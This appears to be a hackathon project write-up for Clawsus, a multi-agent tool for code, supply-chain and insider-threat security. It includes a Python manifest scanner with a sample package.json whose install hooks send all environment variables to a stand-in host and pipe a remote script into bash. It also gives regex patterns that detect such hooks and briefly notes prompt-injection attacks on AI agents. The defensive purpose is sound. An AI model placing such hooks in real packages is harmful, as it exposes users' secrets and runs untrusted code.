Inspiration
Agentic development tools can move quickly across code, dependencies, shell execution, and infrastructure. That speed is useful, but it also creates a larger security surface. Beyond standard risks like generated code introducing Remote Code Execution (RCE) or credentials leaking into repositories, autonomous agents introduce entirely new threat vectors.
They are highly susceptible to supply-chain attacks in which packages run malicious install scripts, as well as to emerging prompt-injection and context-leaking vulnerabilities like the Claude Mythos exploit. UI-driven vulnerabilities like the Canvas hack also show that agents can be manipulated into executing unauthorized actions simply by interacting with poisoned visual or workspace environments. Without strict guardrails, automated fixes can rapidly compound these issues before a human ever notices.
Clawsus was built as a security-first enterprise agent for this exact world. The goal is to detect risk early, whether it stems from malicious code, compromised dependencies, or adversarial manipulation; route it to the right specialist agent; and keep unsafe actions behind clear policy and verification gates.
What it does
Clawsus coordinates a set of specialized cybersecurity agents:
- Vulnerability Scanner: scans source code for RCE, command injection, unsafe eval/exec usage, hardcoded secrets, and other high-risk patterns.
- Supply Chain Guard and Morpheus Agent: inspect dependency manifests, package sources, install scripts, typosquatting signals, and suspicious network behavior.
- Secret Leak Detection: searches repositories for exposed credentials, API keys, tokens, and private key material.
- Sandbox Agent: simulates execution in a restricted NemoClaw/OpenShell-style sandbox, blocks suspicious behavior, and produces a security report.
- Patch & Verify Agent: applies patches on a fix branch, runs tests, commits verified fixes, and can open a pull request.
- Quarantine/Rollback Agent: turns supply-chain findings into remediation actions such as quarantine, uninstall, and rollback.
- Insider Threat Agent: analyzes employee activity logs for repeated failed logins, impossible travel, mass downloads, privilege escalation attempts, and unusual access spikes.
- Dashboard: shows agent health, live logs, endpoints, and vulnerability reports in one operator-facing interface.
How we built it
The project is organized around lightweight Python agents and a browser-based dashboard. The security agents read source trees, dependency files, generated vulnerability reports, and activity logs. Some agents use deterministic rules for fast scanning, while others are designed to call local model endpoints compatible with OpenAI-style chat completions. The workspace includes NemoClaw/OpenClaw integration notes and a blueprint-style configuration for routing inference and sandbox behavior.
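As an added illustration of the deterministic-rule approach described above, applied to the Supply Chain Guard's install-script and typosquatting checks, here is a small Python scanner; it is example code written for this page, not Clawsus's own implementation, and the package allowlist, regex rules and sample manifest are constructed assumptions.

```python
import json
import re
from difflib import SequenceMatcher

# Hypothetical allowlist of well-known names; a real guard would use registry popularity data.
KNOWN_PACKAGES = {"lodash", "express", "axios", "chalk", "react", "dotenv"}

# Lifecycle hooks that npm executes automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Deterministic signals: remote code piped into an interpreter, env reads, network access.
REMOTE_PIPE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|node)\b")
ENV_READ = re.compile(r"process\.env|\$\{?[A-Z_][A-Z0-9_]{2,}\}?|\bprintenv\b|\benv\b")
NETWORK = re.compile(r"\b(curl|wget|fetch|https?://)", re.I)

def typosquat_candidates(name, threshold=0.8):
    """Return known package names that `name` closely resembles but is not."""
    return [k for k in sorted(KNOWN_PACKAGES)
            if k != name and SequenceMatcher(None, name, k).ratio() >= threshold]

def scan_manifest(manifest_text):
    """Scan a package.json document and return structured findings."""
    manifest = json.loads(manifest_text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # `test`, `build` and similar do not run on install
        if REMOTE_PIPE.search(command):
            findings.append({"type": "remote_code_fetch", "severity": "high",
                             "hook": hook, "evidence": command})
        if ENV_READ.search(command) and NETWORK.search(command):
            findings.append({"type": "env_exfiltration", "severity": "high",
                             "hook": hook, "evidence": command})
    for dep in manifest.get("dependencies", {}):
        lookalikes = typosquat_candidates(dep)
        if lookalikes:
            findings.append({"type": "typosquat_signal", "severity": "medium",
                             "package": dep, "resembles": lookalikes})
    return findings

# Constructed sample manifest for demonstration; not a real package.
SAMPLE_MANIFEST = json.dumps({
    "name": "demo-app",
    "scripts": {
        "preinstall": "node -e \"require('https').get('https://example.invalid/c?d=' + encodeURIComponent(JSON.stringify(process.env)))\"",
        "postinstall": "curl -s https://example.invalid/x.sh | bash",
        "test": "node test.js",
    },
    "dependencies": {"lodahs": "^4.17.0", "express": "^4.18.0"},
})
```

Running `scan_manifest(SAMPLE_MANIFEST)` yields three findings: an environment-exfiltration signal on `preinstall`, a remote-code-fetch signal on `postinstall`, and a typosquatting signal for `lodahs` resembling `lodash`.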
The dashboard is built with HTML, CSS, and JavaScript. It visualizes the backend agent system, shows service health, exposes the API-style endpoints, streams simulated logs, and loads JSON reports from the vulnerability and supply-chain scanners.
Challenges we ran into
The main challenge was turning a broad security idea into separate agents with clear responsibilities. Vulnerability detection, dependency scanning, sandboxing, leak detection, rollback, and patch verification all have different inputs and outputs, so the architecture had to keep each workflow simple while still making the whole system feel coordinated.
Another challenge was balancing demo clarity with realistic security behavior. We wanted the system to show concrete findings, such as command injection, eval-based RCE, malicious postinstall scripts, typosquatting, and environment variable exfiltration, without pretending that a single scanner can solve every security problem.
Accomplishments
We built a working multi-agent security prototype with real scan logic, structured JSON reports, a live dashboard, and multiple remediation paths. Clawsus can identify high-risk source patterns, flag suspicious dependency behavior, detect secret leakage patterns, simulate sandbox policy enforcement, and prepare verified patch workflows.
What we learned
The biggest lesson was that agentic security needs orchestration as much as detection. A scanner that finds a problem is useful, but an agent system becomes much more valuable when it can decide whether to quarantine, sandbox, patch, verify, alert, or escalate.
What's next
Next steps are deeper OpenClaw/NemoClaw integration, real container-backed sandbox execution, stronger model-assisted triage, authenticated repository workflows, Telegram/SOC alerting, and a production dashboard that can track continuous scans across multiple repos.